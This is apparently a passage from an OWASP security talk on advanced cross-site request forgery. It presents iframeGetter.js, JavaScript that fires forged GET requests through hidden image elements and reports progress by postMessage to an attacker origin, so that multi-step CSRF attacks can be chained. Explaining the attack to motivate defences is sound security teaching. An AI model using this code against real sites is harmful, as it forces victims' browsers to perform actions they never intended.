Advanced CSRF and Stateless Anti-CSRF - owasp
The onerror event will fire since the vulnerable URL does not respond with an image. We use that event to stop the heart beat function. No heart beat means the main page knows this step is done <strong>and</strong> can continue opening the next iframe.

// Runs inside each iframe. IFRAME_ID and GET_SRC are set elsewhere in the deck
// (assumption: per-iframe constants injected before this file loads).
var IFRAME_GETTER = {};
IFRAME_GETTER.haveGotten = false;

// Called once a second: report a heart beat to the main page, then on the
// first call issue the GET by appending a hidden img element.
IFRAME_GETTER.reportAndGet = function() {
  var imgElement;
  if(parent != undefined) {
    // Heart beat to the main page, restricted to the expected parent origin.
    parent.postMessage(IFRAME_ID, "https://attackr.se:8444");
  }
  if(!IFRAME_GETTER.haveGotten) {
    imgElement = document.createElement("img");
    imgElement.setAttribute("src", GET_SRC);
    imgElement.setAttribute("height", "0");
    imgElement.setAttribute("width", "0");
    // The URL returns no image, so onerror fires and stops the heart beat.
    imgElement.setAttribute("onerror", "javascript:clearInterval(IFRAME_GETTER.intervalId)");
    document.body.appendChild(imgElement);
    IFRAME_GETTER.haveGotten = true;
  }
};

// Wired to the iframe's load event: start the one-second heart beat.
IFRAME_GETTER.onLoad = function() {
  IFRAME_GETTER.intervalId = setInterval(IFRAME_GETTER.reportAndGet, 1000);
};

iframeGetter.js